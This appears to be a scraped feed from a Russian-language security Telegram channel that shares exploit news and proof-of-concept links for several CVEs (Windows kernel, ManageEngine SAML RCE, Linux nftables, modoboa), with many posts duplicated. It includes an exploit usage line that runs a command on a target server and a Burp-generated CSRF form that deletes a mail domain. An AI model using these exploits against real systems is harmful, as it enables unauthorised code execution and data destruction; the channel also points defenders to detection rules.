Windows Kernel Elevation of Privilege Vulnerability.
CVE-2022-21881
cve-2022-21881-io_completion-poc.cpp
CVE-2022-21881
cve-2022-21881-io_completion-poc.cpp
🔥4😱1
Proxy Bar
ChatGPT - для RedTeam и BlueTeam Годная статья с хорошими примерами Читать OpenAI ChatGPT for Cyber Security Если нет учетки OpenAI - попробовать свои силы можно в нашем боте #openAI
ОТСТАВИТЬ ПАНИКУ
БОТ был и останется бесплатным.
Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:
1. Допуск по телеграмм id для всех желающих
или
2. Допуск как и раньше, но с таймаутом сообщений в 30 сек
3. симбиоз первого и второго варианта
БОТ был и останется бесплатным.
Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:
1. Допуск по телеграмм id для всех желающих
или
2. Допуск как и раньше, но с таймаутом сообщений в 30 сек
3. симбиоз первого и второго варианта
👍23😱5
CVE-2022-47966
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe👍2🔥1
В продолжении темы
Появился nuclei-template для дыры CVE-2022-47966.yaml
Ну и сам nuclei забрать тут
****
Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать
Появился nuclei-template для дыры CVE-2022-47966.yaml
Ну и сам nuclei забрать тут
****
Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать
👍7🔥1
CVE-2023-0179-linux_exploit.rar
9.7 KB
CVE-2023-0179 PoC
эксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6
Понять глубину
#linux #kernel #lpe #nftables
эксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6
Понять глубину
#linux #kernel #lpe #nftables
🔥2👍1
CVE-2023-0398 modoboa - mail Server
CSRF приводит к удалению домена
*
usage fot BURP:
CSRF приводит к удалению домена
*
usage fot BURP:
<html>read
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<noscript>history.pushState('', '', '/')</noscript>
<form action="http://127.0.0.1:8000/admin/domains/4/delete/">
<input type="submit" value="Submit request" />
</form>
<noscript>
document.forms[0].submit();
</noscript>
</body>
</html>
🔥4👍3😱1